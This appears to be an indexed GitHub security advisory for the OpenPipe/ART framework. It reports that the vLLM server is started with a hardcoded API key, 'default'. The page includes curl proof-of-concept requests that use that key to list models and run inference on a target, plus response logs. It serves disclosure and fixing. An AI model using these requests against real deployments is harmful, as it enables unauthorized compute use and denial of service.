[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Maintainers usually reply within 3 days
Nobody has claimed this yet.
Assessment
- Difficulty
- 3/5
- Estimated time
- 1-2 days
- Newbie friendliness
- 52/100
Research direction
Read src/art/dev/openai_server.py and the get_openai_server_config function, focusing on the ServerArgs initialization and its api_key handling. Reproduce the documented requests against the local vLLM endpoint, then verify that the predictable default credential no longer grants access while valid configured authentication still works.
Written by the indexing model from the issue text.
Description
Advisory Details
Title: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Description:
Summary
A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to "default". This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.
Details
In src/art/dev/openai_server.py, the get_openai_server_config function is responsible for orchestrating the setup of the internal vLLM server. The ServerArgs data structure is instantiated with a hardcoded api_key="default".
Because this API key is statically assigned and passed to the vLLM engine at startup without automatically generating a secure random token or enforcing a required user-defined key, the vLLM server's internal authentication middleware consistently accepts Authorization: Bearer default for all incoming REST API requests.
PoC
-
Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g.,
8000). -
Step 1 — Confirm auth bypass (list models with hardcoded key):
curl -s http://<target>:8000/v1/models \
-H "Authorization: Bearer default" | python3 -m json.tool
- Step 2 — Demonstrate actual harm (unauthorized inference / GPU resource theft):
curl -s http://<target>:8000/v1/chat/completions \
-H "Authorization: Bearer default" \
-H "Content-Type: application/json" \
-d '{
"model": "Qwen/Qwen1.5-0.5B",
"messages": [{"role": "user", "content": "What is the capital of France?"}],
"max_tokens": 64
}' | python3 -m json.tool
- Step 3 — Negative test (wrong key is correctly rejected, proving auth middleware is active):
curl -i http://<target>:8000/v1/models \
-H "Authorization: Bearer wrong-key"
Log of Evidence
Step 1 — Auth bypass succeeds (model listing):
{
"object": "list",
"data": [
{
"id": "Qwen/Qwen1.5-0.5B",
"object": "model",
"created": 1774020077,
"owned_by": "organization",
"permission": []
}
]
}
Step 2 — Unauthorized inference succeeds (GPU resource theft):
{
"id": "chatcmpl-583d9a951ae8",
"object": "chat.completion",
"created": 1774020077,
"model": "Qwen/Qwen1.5-0.5B",
"choices": [
{
"index": 0,
"message": {
"role": "assistant",
"content": "The capital of France is Paris..."
},
"finish_reason": "stop"
}
],
"usage": {
"prompt_tokens": 30,
"completion_tokens": 36,
"total_tokens": 66
}
}
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can consume GPU compute resources at will without any legitimate credentials.
Step 3 — Wrong key is rejected (auth middleware is active):
HTTP/1.1 401 Unauthorized
content-type: application/json
{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value ("default"), not that authentication is missing.
Impact
This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker able to route traffic to the listening port can entirely bypass the API authentication layer to make arbitrary LLM inference requests. This leads to severe resource exhaustion, financial quota depletion, Denial of Service (DoS) by maxing out GPU computation capabilities, and potential unauthorized reconnaissance of hosted models.
Affected products
- Ecosystem: python
- Package name: art
- Affected versions: <= latest
- Patched versions:
Severity
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Weaknesses
- CWE: CWE-798: Use of Hard-coded Credentials
Occurrences
| Permalink | Description |
|---|---|
| https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30 | The ServerArgs initialization forcefully sets api_key="default", causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions. |
- Dominant language
- Python
- Stars
- 10.8k
- Forks
- 989
- Avg merge
- 11h 38m
- Merged PRs (30d)
- 104
Getting set up
First steps
- Read the whole issue, then the project's contributing guide.
- Comment on the issue to say you are picking it up — it saves two people doing the same work.
- Fork the repository and make your change on a branch.
- Open a pull request that references the issue number.
More from OpenPipe/ART
-
Difficulty 2/5 1-3 hours Newbie friendliness 72/100
Maintainers usually reply within 3 days
-
Difficulty 4/5 3-5 days Newbie friendliness 54/100
OpenPipe/ART#961 · 3 comments ·
Maintainers usually reply within 3 days
-
Difficulty 5/5 Over a week Newbie friendliness 25/100
OpenPipe/ART#949 · 5 comments ·
Maintainers usually reply within 3 days
-
Difficulty 5/5 Over a week Newbie friendliness 10/100
Maintainers usually reply within 3 days
-
Difficulty 5/5 Over a week Newbie friendliness 42/100
Maintainers usually reply within 3 days
Similar issues
-
good first issue
Difficulty 2/5 1-3 hours Newbie friendliness 88/100
-
Difficulty 2/5 1-3 hours Newbie friendliness 88/100
vllm-project/vllm-metal#822 ·
Maintainers usually reply within 1 day
-
vector-store
Difficulty 1/5 1-3 hours Newbie friendliness 90/100
mem0ai/mem0#7461 · 1 comment ·
Maintainers usually reply within 1 day
-
[Bug]: chunk_span_bounds and _validated_chunk_spans reject Pydantic models ChunkSpan and AudioFileOpen
Difficulty 2/5 1-3 hours Newbie friendliness 78/100
BasedHardware/omi#19047 ·
Maintainers usually reply within 1 day
-
Difficulty 2/5 1-3 hours Newbie friendliness 88/100
Maintainers usually reply within 1 day